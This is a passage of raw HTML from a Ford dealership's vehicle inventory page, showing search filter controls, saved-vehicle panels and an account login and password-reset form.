'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;drivetrains&quot;]) } })"> <span>Drivetrain <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;drivetrains&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;drivetrains&quot;; }) } })"> <span>Drivetrain <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;drivetrains&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;drivetrains&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;drivetrains&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD ilbRAa" data-jzlbind-list="h('filtersState.availableFilters.drivetrains.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.drivetrains&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.drivetrains&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { drivetrains: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;drivetrains&#x27;) ? ( h(&#x27;filtersState.selectedFilters.drivetrains&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.drivetrains&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.drivetrains&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;engineCylinders&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;engineCylinders&quot;]) } })"> <span>Engine <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;engineCylinders&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;engineCylinders&quot;; }) } })"> <span>Engine <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;engineCylinders&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;engineCylinders&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;engineCylinders&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD ilbRAa" data-jzlbind-list="h('filtersState.availableFilters.engineCylinders.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.engineCylinders&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.engineCylinders&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { engineCylinders: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;engineCylinders&#x27;) ? ( h(&#x27;filtersState.selectedFilters.engineCylinders&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.engineCylinders&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.engineCylinders&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;transmissions&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;transmissions&quot;]) } })"> <span>Transmission <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;transmissions&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;transmissions&quot;; }) } })"> <span>Transmission <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;transmissions&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;transmissions&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;transmissions&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD ilbRAa" data-jzlbind-list="h('filtersState.availableFilters.transmissions.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.transmissions&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.transmissions&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { transmissions: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;transmissions&#x27;) ? ( h(&#x27;filtersState.selectedFilters.transmissions&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.transmissions&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.transmissions&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div></div><div class="sc-gjAXCV kqIHnM collapsed sc-cSYcjD fVHGdp" data-jzlbind-class="'sc-gjAXCV kqIHnM ' + (h('filtersSearchState.expanded').map(function(x) { return x(); }).includes(&quot;fuelTypes&quot;) ? 'expanded' : 'collapsed')"><div class="sc-dOkuiw eEMhT"><div role="button" tabindex="0" class="collapsed sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;fuelTypes&quot;]) } })"> <span>Fuel <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;fuelTypes&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="expanded sc-jGFFOr jWyTtC" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;fuelTypes&quot;; }) } })"> <span>Fuel <div class="type-filters sc-hAXbOi CBVH sc-gAmQfK iNYjOK" data-jzlbind-class="'type-filters sc-hAXbOi CBVH ' + ('')" hidden="" data-jzlbind-hidden=" ![&quot;fuelTypes&quot;].some(x => { var v = h('filtersState.selectedFilters', x) || []; return v.length > 0; }) "><div class="material-icons undefined sc-cCVOAp hvVvzq">lens</div></div></span></div><div role="button" tabindex="0" class="collapsed sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').concat([&quot;fuelTypes&quot;]) } })"><div class="material-icons pointer">expand_more</div></div><div role="button" tabindex="0" class="expanded sc-hZeNU jMXvnB" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { expanded: h('filtersSearchState.expanded').filter(function(x) { return x() != &quot;fuelTypes&quot;; }) } })"><div class="material-icons pointer">expand_less</div></div></div><div class="sc-hMjcWo jrYwyq"><div class="sc-kMBllD ilbRAa" data-jzlbind-list="h('filtersState.availableFilters.fuelTypes.items')"><script type="x-tmpl-mustache"><div class="sc-hCbubC kiEKbJ sc-hgzKov WquWS" data-jzlbind-class="&#x27;sc-hCbubC kiEKbJ &#x27; + ( (h(&#x27;filtersState.selectedFilters.fuelTypes&#x27;) || []) .some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &#x27;selected&#x27; : &#x27;&#x27; )"><div class="sc-eAudoH kaFpHe buttonComponent plain sc-bLJvFH iJbpqW" data-jzlbind-class="&#x27;sc-eAudoH kaFpHe &#x27; + ( (h(&#x27;filtersState.selectedFilters.fuelTypes&#x27;) || []).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? &quot;buttonComponent checked &quot; : &quot;buttonComponent plain &quot; )" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ filtersState: { selectedFilters: { fuelTypes: h(&#x27;filtersState.selectedFilters&#x27;) != null &amp;&amp; Object.keys(h(&#x27;filtersState.selectedFilters&#x27;)).includes(&#x27;fuelTypes&#x27;) ? ( h(&#x27;filtersState.selectedFilters.fuelTypes&#x27;).some(function(x) { return x() === &#x27;{{value}}&#x27;; }) ? h(&#x27;filtersState.selectedFilters.fuelTypes&#x27;).filter(function(x) { return x() !== &#x27;{{value}}&#x27;; }) : h(&#x27;filtersState.selectedFilters.fuelTypes&#x27;).concat([&#x27;{{value}}&#x27;]) ) : [&#x27;{{value}}&#x27;] } }, }) "><span>{{label}}</span></div></div></script></div></div></div></div><div role="button" tabindex="0" data-jzlbind-hidden="!h('filtersSearchState.additionalFiltersShown')" data-jzlbind-tap="jzlMergeState({ filtersSearchState: { additionalFiltersShown: false } })" class="sc-ZUflv gySaQJ"><span class="text">Fewer Filters</span></div></div><div class="sc-cmUJln bpoBDg"><div data-jzlbind-hidden=" Object.keys(h('filtersState.selectedFilters') || []) .filter(function(x) { var values = h('filtersState.selectedFilters', x); return x != 'value' &amp;&amp; values != null &amp;&amp; values != &quot;&quot;; }) .length == 0 " data-jzlbind-tap="jzlMergeState({ filtersSearchState: { additionalFiltersShown: false, expanded: [] } })" class="sc-esoVGF cOsyJ"><span role="button" tabindex="0" data-jzlbind-tap="jzlMergeState({ filtersState: { selectedFilters: { textSearch: [],conditions: [],models: [],years: [],priceRange: [],exteriorColors: [],interiorColors: [],mpgCityRange: [],mpgHighwayRange: [],mpgCombinedRange: [],mileageRange: [],bodyTypes: [],drivetrains: [],engineCylinders: [],transmissions: [],fuelTypes: [],passengers: [],features: [],cabStyles: [],genericNumber1: [],genericNumber2: [],genericNumber3: [],genericText1Literal: [],genericText2Literal: [],genericText3Literal: [] } }, })" class="sc-cAJUJo bhhXoF">Clear All</span></div><div class="sc-esoVGF cOsyJ"><a role="button" id="filters-submit-button" tabindex="0" href="https://www.5starford.com/inventory/all-vehicles/" data-jzlbind-href="'https://www.5starford.com/inventory/all-vehicles/' + window.jzlRocketSearchBuildQuery(hf('filtersState.selectedFilters'))" class="sc-hPeUyl kssVtK">Done</a></div></div></div></div></div></div><div class="sc-esExBO gNtFqn hidden hiddenBottom sc-dWcDbm fMVLCo" data-jzlbind-class="'sc-esExBO gNtFqn ' + ((h('bars.activeBars').map(function(x) { return x(); }).filter(function(x) { return x != null; }).join(' ')) + ' ' + ((h('panels.activePanel') == 'footer-favorites') ? '' : (true) ? 'hidden hiddenBottom' : ''))"><div class="sc-csZoYU bNxQUf sc-ctwKVn bjLtsj" data-jzlbind-class="'sc-csZoYU bNxQUf ' + (h('panels.hasChanged') === true ? 'hasChanged' : '')" id="footer-favorites"><div class="sc-hTQSVH bBzUYS"><div class="sc-gKLXLV eEUiqa not_the_siderail shop sc-gohEOc ksKrtE" data-jzlbind-class="'sc-gKLXLV eEUiqa ' + ('not_the_siderail ' + h('sideRailState.page'))"><div class="sc-ePAWwb fdmzHg"><div class="sc-fObBmV dEYHnQ"><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({'sideRailState': { page: 'shop' }}) " class="sc-ldcLGC kzoAAg">Shop</div><div role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({'sideRailState': { page: 'account' }}) " class="sc-ldcLGC kzoAAg">Account</div></div><div class="sc-hXhGGG eosNiI"></div></div><div class="sc-bvCTgw sc-gCKARq cZpyWc"><div class="sc-ijhsb jwmmcQ"><div data-jzlbind-hidden=" !( (h('cognito.notifications') || []).length > 0 ) "><div height="80" data-jzlbind-list="h('cognito.notifications')"><script type="x-tmpl-mustache"><div class="sc-bWjmDF cJXjku"><div class="sc-kvkilB eQDKhU"><a href="{{linkTarget}}" class="sc-cANqwJ kSQXnb">{{#titleLine}}<div class="sc-jGkVzM eaUGlQ">{{titleLine}}</div>{{/titleLine}}{{#line1}}<div class="sc-clWJBl jiBOTl">{{line1}}</div>{{/line1}}{{#line2}}<div class="sc-clWJBl jiBOTl">{{line2}}</div>{{/line2}}{{#actionLine}}<div class="sc-fYAFcb eOFbyi">{{actionLine}}</div>{{/actionLine}}</a>{{#dismissAction}}<div title="Dismiss" role="button" tabindex="0" data-jzlbind-tap=" jzlMergeState({ cognito: { notifications: (hf(&#x27;cognito.notifications&#x27;) || []) .filter(function(x) { return x.index != {{index}}; }), dismiss_notification: &quot;{{dismissAction}}&quot; } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-kAKrxA iaHKBE"><div class="material-icons undefined sc-cCVOAp hebmLA" color="#999">clear</div></div>{{/dismissAction}}</div></div></script></div></div><div data-jzlbind-hidden=" !( (h('cognito', h('shopPageState.mode') + &quot;_favorite_vins&quot;) || []).length > 0 ) "><hr><div class="sc-hSmEHG iLYHHX">Saved Vehicles</div><div data-jzlbind-list=" (h('cognito', h('shopPageState.mode') + &quot;_favorite_vins&quot;) || []) .map(function(vin) { return h('cognito.all_vehicles', vin()) }) "><script type="x-tmpl-mustache"><div class="sc-ccvjgv bIUEdz"><a href="{{url}}" class="sc-ccbnFN gunzTT"><div class="sc-fNHLbd lfbZcs">{{year}} {{make}} {{model}} {{trim}}</div><div class="sc-fNHLbd lfbZcs">Stock #{{stockNumber}} - {{formattedPrice}}</div></a><div class="sc-jMtzgO gZjVkf"><div role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length == 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .concat(&#x27;{{vin}}&#x27;) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp loFpun" color="#666">star_border</div></div><div hidden="" role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length &gt; 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x !== &#x27;{{vin}}&#x27;; }) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp ivnIst" color="#fef131">star</div></div></div></div></script></div></div><div data-jzlbind-hidden=" !( (h('cognito', h('shopPageState.mode') + &quot;_recent_vins&quot;) || []).length > 0 ) "><hr><div class="sc-hSmEHG iLYHHX">Viewed Vehicles</div><div data-jzlbind-list=" (h('cognito', h('shopPageState.mode') + &quot;_recent_vins&quot;) || []) .map(function(vin) { return h('cognito.all_vehicles', vin()) }) "><script type="x-tmpl-mustache"><div class="sc-ccvjgv bIUEdz"><a href="{{url}}" class="sc-ccbnFN gunzTT"><div class="sc-fNHLbd lfbZcs">{{year}} {{make}} {{model}} {{trim}}</div><div class="sc-fNHLbd lfbZcs">Stock #{{stockNumber}} - {{formattedPrice}}</div></a><div class="sc-jMtzgO gZjVkf"><div role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length == 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .concat(&#x27;{{vin}}&#x27;) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp loFpun" color="#666">star_border</div></div><div hidden="" role="button" tabindex="0" data-jzlbind-hidden=" !(h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x === &#x27;{{vin}}&#x27;; }) .length &gt; 0 " data-jzlbind-tap=" jzlMergeState({ cognito: { favorite_vins: (h(&#x27;cognito.favorite_vins&#x27;) || &quot;&quot;) .split(&quot;,&quot;) .filter(function(x) { return x !== &#x27;{{vin}}&#x27;; }) .join(&quot;,&quot;) } }), jzlBindElement(&#x27;cognito-event-node_DataForm&#x27;).submit() " class="sc-lhLRcH kSHzFa"><div class="material-icons undefined sc-cCVOAp ivnIst" color="#fef131">star</div></div></div></div></script></div></div><div role="button" tabindex="0" data-jzlbind-hidden=" !( h('cognito.long_list_exists') ) " data-jzlbind-tap=" jzlMergeState({ shopPageState: { mode: h('shopPageState.mode') == &quot;short&quot; ? &quot;long&quot; : &quot;short&quot; } }) " class="sc-ePDpFu iDyXGW"><div data-jzlbind-hidden=" !(h('shopPageState.mode') == &quot;short&quot;) ">Show All</div><div hidden="" data-jzlbind-hidden=" !(h('shopPageState.mode') == &quot;long&quot;) ">Show Less</div></div></div></div><div class="sc-bvCTgw sc-fjdPjP gLrMCP"><div class="sc-ekHBYt eRautH info-popup loading sc-cLxPOX fNIlHb" data-jzlbind-class="'sc-ekHBYt eRautH ' + ('info-popup ' + (h('cognito') != null ? (h('cognito.is_logged_in') ? h('loginPopupState.accountPage') : h('loginPopupState.page')) : &quot;loading&quot;))"><div class="sc-eTyWNx sc-ccXozh ilswia"><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-bsVVwV uKeDN"><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/login/" data-jzlbind-submit-success=" jzlMergeState({ login_messages: null, cognito: event.response.data, loginPopupState: { page: 'login' } }) " data-jzlbind-submit-error=" jzlMergeState({ login_messages: event.response.errors, loginPopupState: { page: 'login' } }) " data-jzlbind-submit=" jzlMergeState({ login_messages: null, loginPopupState: { page: 'logging-in' } }) " class="sc-cClmTo bClNws"><input type="hidden" name="cid" value="CLIENT_ID(cid)" data-jzlbind-replace="CLIENT_ID"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="hidden" name="config" value="eyJjb25maWdEZWFsZXJOYW1lIjoiRml2ZSBTdGFyIEZvcmQiLCJjb25maWdEZWFsZXJBZGRyZXNzIjoiMTIzIE1haW4gU3QuIiwiY29uZmlnRGVhbGVyQ2l0eSI6Ik5vcnRoIFJpY2hsYW5kIEhpbGxzIiwiY29uZmlnRGVhbGVyU3RhdGUiOiJUZW5uZXNzZWUiLCJjb25maWdEZWFsZXJTdGF0ZVNob3J0IjoiVFgiLCJjb25maWdEZWFsZXJaaXAiOiI3NjE4MC03ODQ0IiwiY29uZmlnRGVhbGVyUHJpbWFyeVBob25lTnVtYmVyIjoiKDgxNykgNDk4LTg4MzgiLCJjb25maWdWZHBMaW5rVGVtcGxhdGUiOiJ7e2NvbmRpdGlvbnM6dXNlZF9vcl9jZXJ0aWZpZWR9fSB7e3llYXJ9fSB7e21ha2V9fSB7e21vZGVsfX0ge3tsb2NhdGlvbl9jaXR5fX0ge3tsb2NhdGlvbl9zdGF0ZX19IiwiY29uZmlnRW5hYmxlSW5kZXBlbmRlbnRWZHAiOmZhbHNlLCJjb25maWdEZWFsZXJTcnBVcmwiOiJodHRwczovL3d3dy41c3RhcmZvcmQuY29tL2ludmVudG9yeS9hbGwtdmVoaWNsZXMvIn0="><input type="email" name="email" placeholder="Email" class="sc-iVOTot bFQrxy"><input type="password" name="password" placeholder="Password" class="sc-iVOTot bFQrxy"><div hidden="" data-jzlbind-hidden="!(h('login_messages.invalid_username_or_password'))" class="sc-hZhUor dZAGSV">The username or password provided is incorrect.</div><button class="sc-kOCNXg cVDDPa">Sign in</button></form><div class="sc-jMvuUo jHXAdR"><div data-jzlbind-tap=" jzlMergeState({ reset_password_data: null, loginPopupState: { page: 'reset-password' } }) " class="sc-fxgLge iNwmcz"><span class="sc-hDgvsY cisAUF">Forgot Password</span></div></div><div class="sc-jMvuUo jHXAdR"><div data-jzlbind-tap=" jzlMergeState({ loginPopupState: { page: 'sign-up' } }) " class="sc-fxgLge iNwmcz"><span class="sc-hDgvsY cisAUF">Create an Account</span></div></div><div class="sc-gtXRHa hsPEoE"><div class="sc-fyjYeE bYgfZs"></div><div class="sc-ixltIz fhsInK">OR</div><div class="sc-fyjYeE bYgfZs"></div></div><div class="sc-jMvuUo jHXAdR"><a href="https://userlogin.jazelc.com/auth/facebook/start-login?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;rocketUxCognitoEndpointBase=https://rocket-prod.jazelc.com:29620/cognito/" data-jzlbind-replace="CLIENT_ID"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt="facebook" width="240" height="43" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://rocket-prod.jazelc.com:29620/amp-static/images/auth/facebook.png"></a></div><div class="sc-jMvuUo jHXAdR"><a href="https://userlogin.jazelc.com/auth/loginwithamazon/start-login?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;rocketUxCognitoEndpointBase=https://rocket-prod.jazelc.com:29620/cognito/" data-jzlbind-replace="CLIENT_ID"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt="loginWithAmazon" width="240" height="49" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://rocket-prod.jazelc.com:29620/amp-static/images/auth/loginWithAmazon.png"></a></div><div class="sc-jMvuUo jHXAdR"><a href="https://userlogin.jazelc.com/auth/googlesignin/start-login?cid=CLIENT_ID(cid)&amp;group_id=fivestarfordnrhspeed-sherwin&amp;rocketUxCognitoEndpointBase=https://rocket-prod.jazelc.com:29620/cognito/" data-jzlbind-replace="CLIENT_ID"><img src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt="googleSignIn" width="240" height="51" onerror="this.src=this.dataset.fallbackSrc;this.dataset.error='true';this.onerror='';" class="rocket-contain-self sc-cLQEGU cETcYM" data-jzlbind-image-src="https://rocket-prod.jazelc.com:29620/amp-static/images/auth/googleSignIn.png"></a></div></div><div class="sc-eTyWNx sc-kbGplQ mkuBu"><div>Logging in...</div><div class="sc-iysEgW iYIlYh"><div class="sc-kDgGX iazLmv"></div></div></div><div class="sc-eTyWNx sc-exdmVY dONquv"><div><div><span data-jzlbind-tap=" jzlMergeState({ reset_password_data: null, reset_password_messages: null, loginPopupState: { page: 'login' } }) " class="sc-hDgvsY cisAUF">&lt; Back</span></div><div class="sc-jMvuUo jHXAdR">Reset Password</div><form method="POST" target="_top" data-jzlbind-action-xhr="https://rocket-prod.jazelc.com:29620/cognito/reset_password/" data-jzlbind-submit-success=" jzlMergeState({ reset_password_data: event.response.data, reset_password_messages: null, loginPopupState: { page: !event.response.data.email ? 'login' : 'reset-password' } }) " data-jzlbind-submit-error=" jzlMergeState({ reset_password_messages: event.response.errors, loginPopupState: { page: 'reset-password' } }) " data-jzlbind-submit=" jzlMergeState({ reset_password_messages: null, loginPopupState: { page: 'resetting-password' } }) " class="sc-cClmTo bClNws"><input type="hidden" name="group_id" value="fivestarfordnrhspeed-sherwin"><input type="email" name="email" placeholder="Email" data-jzlbind-hidden="!!(h('reset_password_data.email'))" class="sc-iVOTot bFQrxy"><input type="code" name="code" placeholder="Verification Code" data-jzlbind-hidden="!(h('reset_password_data.email'))" class="sc-iVOTot bFQrxy"><input type="password" name="password" placeholder="New Password" data-jzlbind-hidden="!(h('reset_password_data.email'))" class="sc-iVOTot bFQrxy"><input type="hidden" name="mode" data-jzlbind-value="!(h('reset_password_data.email')) ? 'request' : 'reset'"><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.email_required'))" class="sc-hZhUor dZAGSV">Please provide an email address.</div><div hidden="" data-jzlbind-hidden="!(h('reset_password_messages.user_not_exist'))" class="sc-hZhUor dZAGSV">User does not exist.</div><div 